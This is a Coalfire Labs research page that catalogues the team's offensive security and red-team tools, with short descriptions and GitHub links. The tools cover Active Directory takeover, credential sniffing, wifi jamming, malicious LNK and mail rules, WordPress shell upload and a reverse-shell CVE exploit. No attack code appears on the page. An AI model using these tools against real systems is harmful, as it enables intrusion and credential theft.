Research and Development

Malware and Vulnerability Research, Open Source Tools, and Opinions

The Coalfire Labs Research and Development (R&D) team creates cutting-edge, open source security tools to provide more realistic adversary simulations to Coalfire customers, and advances operational tradecraft for the security industry and community.

Coalfire Labs R&D division identifies unknown vulnerabilities, provides firsthand knowledge and insights into the latest malware trends and attacker TTPs (Techniques, Tactics & Procedures), and develops and contributes to existing security tools commonly used by security community. The R&D Team also creates custom solutions to assist Coalfire’s Red Teams and Penetration Testing operations to provide additional value to customers.

We strive to use our expertise to improve all aspects of information security and to constantly push forward the state of industry.

Featured Tools

 

Icebreaker

Break the ice with that cute Active Directory environment over there. When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential to join the fun, this tool's for you.

>> Learn more

DeathStar

DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techniques.

>> Learn more

iOS 11 Jailbreak

This jailbreak works for iOS 11.1.2 (15B202) and enables running unsigned code, a remote shell, full filesystem access, and live kernel memory introspection. View white paper

>> Learn more

Icebreaker

Break the ice with that cute Active Directory environment over there. When you're cold and alone staring in at an Active Directory party but don't possess even a single AD credential to join the fun, this tool's for you.

https://github.com/danmcinerney/icebreaker

-----------------------------------------------------

Red Baron

Red Baron is a set of modules and custom/third-party providers for Terraform that automates the creation of resilient, disposable, secure, and agile infrastructure for Red Teams while at the same time reducing the amount of code required to do so and making it as accessible as possible.

https://github.com/Coalfire-Research/red-baron

-----------------------------------------------------

Java Deserialization Exploit

A collection of curated Java Deserialization Exploits.

https://github.com/Coalfire-Research/java-deserialization-exploits

-----------------------------------------------------

iOS 11 Jailbreak

This jailbreak works for iOS 11.1.2 (15B202) and enables running unsigned code, a remote shell, full filesystem access, and live kernel memory introspection. View white paper

https://github.com/Coalfire-Research/iOS-11.1.2-15B202-Jailbreak

-----------------------------------------------------

CrackMapExec (CME)

A swiss army knife for pentesting networks

https://github.com/byt3bl33d3r/CrackMapExec

-----------------------------------------------------

DeathStar

DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques.

https://github.com/byt3bl33d3r/DeathStar

-----------------------------------------------------

Net-creds

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

https://github.com/DanMcInerney/net-creds

-----------------------------------------------------

Wifijammer

Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block radius with heavy access point saturation.

https://github.com/DanMcInerney/wifijammer

-----------------------------------------------------

Xsscrapy

Fast, thorough, XSS/SQLi spider. Give it a URL and it'll test every link it finds for cross-site scripting and some SQL injection vulnerabilities. See FAQ for more details about SQLi detection.

https://github.com/DanMcInerney/xsscrapy

-----------------------------------------------------

Pentest machine

Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/.

https://github.com/DanMcInerney/pentest-machine

-----------------------------------------------------

LANs.py

Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit.

https://github.com/DanMcInerney/LANs.py

-----------------------------------------------------

Malrule

Quick and painless utility to generate malicious OWA rules.

https://github.com/arch4ngel/malrule

-----------------------------------------------------

sLNKy

sLNKy is a utility that automates the process of generating and dropping malicious LNK files on SMB shares.

https://github.com/arch4ngel/slnky

-----------------------------------------------------

WPForce

WPForce is a suite of Wordpress Attack tools. Currently this contains 2 scripts - WPForce, which brute forces logins via the API, and Yertle, which uploads shells once admin credentials have been found. Yertle also contains a number of post exploitation modules.

https://github.com/n00py/WPForce

-----------------------------------------------------

pOSt-eX

This script creates a new rule in the OS X Mail application to automatically trigger an AppleScript payload when an email is recieved using a trigger word in the subject of the email.

https://github.com/n00py/pOSt-eX

-----------------------------------------------------

Dissonance

This script was designed to spoof a Synergy server and to entice users to connect to it.

https://github.com/n00py/Dissonance

-----------------------------------------------------

Hwacha

Hwacha is a tool to quickly execute payloads on *Nix based systems. Easily collect artifacts or execute shellcode on an entire subnet of systems for which credentials are obtained.

https://github.com/n00py/Hwacha

-----------------------------------------------------

HandyHeaderHacker

HandyHeaderHacker is a script to examine HTTP responses from a server for best security practices. You can quickly analyze a web server with a single request.

https://github.com/vpnguy/HandyHeaderHacker

-----------------------------------------------------

AmazonSecurityScanner

AmazonSecurityScanner (ASS) is a script to scan a EC2 instance for potential AWS related attack surfaces. You can utilize it for rapid post exploitation reconnaissance on a compromised EC2 instance.

https://github.com/vpnguy/AmazonSecurityScanner

-----------------------------------------------------

CrestCrack

CrestCrack is a simple script that exploits CVE-2016-5640 / CLVA-2016-05-002 within the Crestron AirMedia AM-100 (v1.1.1.11 - v1.2.1). When supplied with arguments CrestCrack will utilize netcat to create a reverse shell between your target and a netcat listener of your choice.

https://github.com/vpnguy/CrestCrack

-----------------------------------------------------

NorkNork

This script was designed to identify Powershell Empire persistence payloads on Windows systems.

https://github.com/n00py/NorkNork

-----------------------------------------------------

AngryHippo

This script was designed to attack the HippoConnect protocol which is used with the HippoRemote iPhone app and the HippoConnect listener.

https://github.com/n00py/AngryHippo